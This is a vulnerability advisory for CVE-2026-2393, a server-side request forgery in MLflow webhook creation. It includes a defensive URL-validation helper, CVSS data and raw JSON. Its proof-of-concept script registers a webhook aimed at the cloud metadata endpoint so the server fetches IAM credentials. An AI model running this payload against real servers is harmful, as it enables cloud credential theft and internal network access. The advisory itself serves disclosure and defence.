Security Vulnerability Report
CVE-2026-2393 (CVSS 7.1, HIGH)

Published: 2026-05-11 18:16:32
Last Modified: 2026-05-11 20:25:41

Description

A Server-Side Request Forgery (SSRF) vulnerability exists in MLflow versions prior to 3.9.0. The `_create_webhook()` function in `mlflow/server/handlers.py` accepts a user-controlled `url` parameter without validation, and the `_send_webhook_request()` function in `mlflow/webhooks/delivery.py` sends HTTP POST requests to this attacker-controlled URL. This allows an authenticated attacker to force the MLflow backend to send HTTP requests to internal services, cloud metadata endpoints, or arbitrary external servers. The lack of input sanitization, URL scheme filtering, or allowlist validation on the webhook URL enables exploitation, potentially leading to cloud credential theft, internal network access, and data exfiltration.
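A defender-side check for the sink described above, added here as an example and not MLflow's own fix (the referenced commit is not reproduced): it validates a user-supplied webhook URL by scheme, optional hostname allowlist, and the address range every resolved record falls in, before the URL is stored. The resolver is injectable so the check runs offline; all hostnames and addresses in the test inputs are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _default_resolve(host):
    """Return every IPv4/IPv6 address the hostname resolves to."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def _is_public(ip):
    """False for loopback, link-local (incl. 169.254.169.254), RFC 1918, CGNAT, multicast, etc."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # unwrap ::ffff:a.b.c.d so a mapped IPv4 cannot bypass the check
    return ip.is_global and not ip.is_multicast


def validate_webhook_url(url, resolve=_default_resolve, allowlist=None):
    """Return (ok, reason) for a user-supplied webhook URL.

    `resolve` is injectable so the check runs offline in tests; `allowlist` is an
    optional set of lowercase hostnames that are the only permitted destinations.
    (Hypothetical helper, not an MLflow API.)
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    if allowlist is not None and host.lower() not in allowlist:
        return False, f"host {host!r} not in allowlist"
    try:
        addrs = [ipaddress.ip_address(host)]  # IP literal: no DNS lookup needed
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(host)]
        except (socket.gaierror, ValueError) as exc:
            return False, f"cannot resolve {host!r}: {exc}"
    # One non-public A/AAAA record is enough to reject the whole hostname.
    for ip in addrs:
        if not _is_public(ip):
            return False, f"{host!r} resolves to non-public address {ip}"
    # Re-run this check right before each delivery and send with redirects disabled:
    # validating only at creation time leaves DNS rebinding and 3xx redirects to
    # internal hosts open.
    return True, "ok"
```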

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

MLflow < 3.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-2393: MLflow SSRF
# Target: MLflow server instance
target_url = "http://localhost:5000/api/2.0/mlflow/webhooks/create"

# Attacker controlled URL (e.g., Cloud Metadata Service)
malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

payload = {
    "name": "exploit_webhook",
    "events": ["MODEL_VERSION_TRANSITIONED_STAGE"],
    "http_url_spec": {
        "url": malicious_url,
        "authorization": "Bearer dummy_token",
    },
}

# Send the malicious request
response = requests.post(target_url, json=payload)
if response.status_code == 200:
    print("[+] Webhook created successfully. SSRF triggered.")
else:
    print(f"[-] Failed to create webhook. Status: {response.status_code}")
```

References

- https://github.com/mlflow/mlflow/commit/64aa0ab7207f9c649b59ba1a5f40d82196817389 (mlflow/mlflow commit)
- https://huntr.com/bounties/04ef100d-06b5-4a70-95b1-b7be23aa8150 (huntr bounty report)
- Weakness: CWE-918
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-2393",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-11T18:16:31.500",
    "lastModified": "2026-05-11T20:25:41.320",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A Server-Side Request Forgery (SSRF) vulnerability exists in MLflow versions prior to 3.9.0. The `_create_webhook()` function in `mlflow/server/handlers.py` accepts a user-controlled `url` parameter without validation, and the `_send_webhook_request()` function in `mlflow/webhooks/delivery.py` sends HTTP POST requests to this attacker-controlled URL. This allows an authenticated attacker to force the MLflow backend to send HTTP requests to internal services, cloud metadata endpoints, or arbitrary external servers. The lack of input sanitization, URL scheme filtering, or allowlist validation on the webhook URL enables exploitation, potentially leading to cloud credential theft, internal network access, and data exfiltration."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-918"}]
      }
    ],
    "references": [
      {"url": "https://github.com/mlflow/mlflow/commit/64aa0ab7207f9c649b59ba1a5f40d82196817389", "source": "[email protected]"},
      {"url": "https://huntr.com/bounties/04ef100d-06b5-4a70-95b1-b7be23aa8150", "source": "[email protected]"},
      {"url": "https://huntr.com/bounties/04ef100d-06b5-4a70-95b1-b7be23aa8150", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}
    ]
  }
}
```